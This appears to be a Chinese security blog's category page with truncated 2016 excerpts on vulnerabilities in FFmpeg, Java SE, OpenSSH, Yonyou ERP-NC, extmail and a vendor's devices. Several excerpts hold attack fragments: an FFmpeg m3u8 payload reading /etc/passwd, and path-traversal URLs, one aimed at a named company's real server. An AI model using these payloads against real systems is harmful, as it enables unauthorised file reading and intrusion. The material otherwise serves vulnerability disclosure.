分类 Others 下的文章

FFmpeg文件读取漏洞测试及利用

from:安全脉搏经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。看了老外写的文章,大概理解的利用方式如下:#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd #EXT-X-E...

没穿底裤 2016 年 06 月 01 日 暂无评论

Oracle out-of-band release for Java SE Vulnerability

0)漏洞简介漏洞编号:CVE-2016-0636,此漏洞是安全研究员(Adam Gowdiak)于2013年报告给Oracle的漏洞(CVE-2013-5838)的变体。由于Oracle在部分代码分支中未对该漏洞进行修补,导致了此漏洞再现江湖,影响版本:java SE 7u97, 8u73, 8u74。1)测试环境Windows 7 x86 + jdk_1.8.0_742)漏洞分析由于反射A...

没穿底裤 2016 年 03 月 29 日 暂无评论

华夏创新四种设备存在命令执行以及文件遍历

1.任意文件读取/tmp/appexcfg/www/acc/vpn/download.php<?php     $file = $_REQUEST['f'];     if(!file_exists('/www/cert/'))//判断目录是否存在         mkdir('/www/cert/');//不存在就创建     if(!file_exists("/www/ce...

没穿底裤 2016 年 01 月 23 日 暂无评论

Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778

Qualys Security AdvisoryRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778======================================================================== Contents ========================...

没穿底裤 2016 年 01 月 16 日 暂无评论

用友ERP-NC某处通用文件包含漏洞

漏洞作者: 管管侠详细说明:可以遍历各种系统文件,影响大量知名政校企漏洞证明:中粮集团 http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd还可以读取默认配置文件 http://nc.cofco.com/NCFindWeb?servic...

没穿底裤 2016 年 01 月 04 日 暂无评论

extmail邮件服务存在漏洞读取任意用户邮件内容

漏洞作者: 路人甲简要描述:1.网络磁盘 越权访问上层目录泄露文件名 2.通过添加附件将敏感文件发送到指定邮箱 3.获取邮件ID后读取任意邮件内容详细说明:漏洞1.code 区域 GET http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&sid=xxxxf&base=../.. HTTP/1.1 漏洞...

没穿底裤 2016 年 01 月 04 日 暂无评论